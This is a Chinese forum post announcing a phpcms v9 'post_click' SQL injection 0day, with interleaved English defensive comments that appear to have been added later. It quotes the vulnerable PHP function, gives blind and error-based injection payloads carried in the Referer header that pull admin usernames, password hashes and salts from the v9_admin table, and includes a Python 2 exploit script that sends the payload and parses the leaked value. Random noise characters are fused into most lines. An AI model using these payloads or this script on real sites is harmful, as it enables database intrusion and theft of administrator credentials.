
标题: phpcms post_click注入0day利用代码 [打印本页]

作者: admin    时间: 2013-1-11 21:01
标题: phpcms post_click注入0day利用代码
有人放出了phpcmsv9的0day,就随手写了个利用代码,其中注入代码有两种形式:
问题函数 \phpcms\modules\poster\index.php
// Defensive annotation of poster_click() as quoted in this post. The stray character
// runs fused into the lines appear to be forum-inserted copy noise, not original code.
& s9 P5 k" a8 \: t% dpublic function poster_click() {
// `id` is cast with intval(), so this parameter is not where tainted SQL can enter.
" p" J, _  z" |' d( Y8 W# f0 _$ U$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
$ A- Z8 [* U% j7 x8 d$r = $this->db->get_one(array('id'=>$id));  I. D4 }' W/ W+ {, z
if (!is_array($r) && empty($r)) return false;
/ b1 W( u3 p  W. a5 i) K$ k$ip_area = pc_base::load_sys_class('ip_area');
4 A3 \5 k  g2 u7 r+ O$ip = ip();( H9 Q! a: S# H  N9 v7 h) h4 }
$area = $ip_area->get($ip);* d+ D1 V/ [' f
// NOTE(review): the cookie value comes from param::get_cookie(); whether it is escaped
// before it reaches the INSERT below is not visible here — confirm in the framework.
$username = param::get_cookie('username') ? param::get_cookie('username') : '';0 }. G/ c$ Q1 r3 C$ V6 l
if($id) {
) G% H! N$ h! _% D8 z$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();' o$ H. ]0 o$ y4 K( S; }' A5 [
// Injection point named by this post: the client-supplied Referer header (HTTP_REFERER)
// is stored with the click record, and per the post it reaches the INSERT unescaped.
// Mitigation: escape or bind every value handed to insert() — a free-form string such
// as a referer must never be concatenated into SQL — and keep MySQL error text out of
// HTTP responses so an error-based probe learns nothing. Detection: SQL syntax inside
// Referer headers and "Duplicate entry" errors in responses to this action are both
// strong signals.
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));4 C0 d5 {0 i' s3 }% O/ m, Y* O4 F& Q
}: e6 g0 Y  n2 S6 S$ N2 s3 H
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));3 i& Z' T. j  A% N1 I% W* n
$setting = string2array($r['setting']);9 T# a' b% E2 O
if (count($setting)==1) {
7 h% ?6 u- V/ _  R$ j9 f2 o$url = $setting['1']['linkurl'];
: f& z) a6 |2 k5 T# s  _; W/ q# M} else {! O$ G, r2 Q: Y
// Separate issue visible here: when more than one setting entry exists, an arbitrary
// `url` query parameter is accepted and used verbatim in the redirect below, i.e. an
// open redirect. Restrict the target to the configured linkurl values (or validate
// its host) instead of trusting the query string.
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];2 H$ _# Q' Y9 |0 c
}
: F0 G7 Q& W& \) h( A4 Theader('Location: '.$url);& J6 H1 q) M( R) Q
}; d: H5 R5 {. j, o" j) E

利用方式:
1、可以采用盲注入的手法:
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#) Y. g6 _, d* x. W* }
通过返回页面正常与否,一个个猜解密码字段。
2、代码是花开写的,随手附上了:
( r4 o, S0 I8 C% ^- }% f: ~1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#1 `, x7 u: X2 ~, o* K

此方法是爆错注入手法,原理自查。

利用程序:

8 d2 K, m: L9 ^' m#!/usr/bin/env python/ f2 z; K) M( ?  ~9 D8 X1 d
import httplib,sys,re; V. U. L! F; N# u0 {. {: G& p

# Defensive annotation of the script reproduced in this post. As pasted it is Python 2
# (print statements, httplib) with typographic quotes and forum copy noise fused into
# most lines, so it is not runnable as shown; the notes below describe what it targets
# and what a defender can look for, not how to repair it.
3 N) v* k) K; _8 l- H, B: u0 k: Qdef attack():
! e" w4 ^. p" y9 H4 @8 bprint “Code by Pax.Mac Team conqu3r!”5 O6 y; m% T7 U# H
print “Welcome to our zone!!!”
# argv[1] is the host, argv[2] the install path (see the usage text under __main__).
2 ]" @9 r8 u7 t' T( V  Durl=sys.argv[1]
( p7 x' B& ], n/ rpaths=sys.argv[2]' n6 R7 F% y3 m) `: {
conn = httplib.HTTPConnection(url)( r' R, F, J' b
# The payload (the error-based form shown earlier in the post) travels in the Referer
# header, which — per the post — poster_click() stores without escaping. Detection
# signals: SQL keywords (SELECT, concat, information_schema) inside a Referer value,
# and the stale hard-coded Firefox 3.5 User-Agent repeated across requests.
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
) m" r! `$ d4 A! p0 }, E! L“Accept”: “text/plain”,
+ [8 c( o* S3 k, c: C8 x% m“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
# A single GET to the poster_click action; the integer id/siteid parameters are not
# the injection point (the PHP casts them with intval()).
! T7 A( C: \* T# N, z6 f5 a6 R) _conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)) W. A" V( k9 \5 E
r1 = conn.getresponse()
7 l2 H- F- ?3 h& Ddatas=r1.read()5 h$ v8 E4 [% M
# The result is read from a MySQL "Duplicate entry" error echoed in the response body.
# Keeping database error text out of HTTP responses (generic error page, display_errors
# off) closes this channel even while the INSERT itself is still unfixed. re.findall()
# returns an empty list when no such error is present, so datas[0] then raises IndexError.
datas=re.findall(r”Duplicate entry \’\w+’”, datas)9 x: h! A1 c8 B3 r
print datas[0]" g; l% B+ j5 }0 n
conn.close()
# Entry point: prints usage and exits unless two arguments (host, install path) are
# given, otherwise calls attack(). The usage lines show the install path as either the
# web root ("/") or a sub-directory.
8 k' r. Y2 V) z: s$ Aif __name__==”__main__”:- z: o2 Z" j8 t& c2 V
if len(sys.argv)<3:( p9 S" i3 u( M; e( p
print “Code by Pax.Mac Team conqu3r”
0 I+ q5 D+ v6 A# G* H2 sprint “Usgae:”
2 m$ T+ m5 w3 ]+ u, Zprint “    phpcmsattack.py   www.paxmac.org /”2 V" g# D: T+ t) r- t
print “    phpcmsataack.py   www.paxmac.org /phpcmsv9/”
% K. y1 ^2 h% S! D1 usys.exit(1)
( E+ l* p: Z+ F- Y# P. E6 |attack()$ M/ u+ y4 ?' D6 C8 P$ F* z3 M' B. e




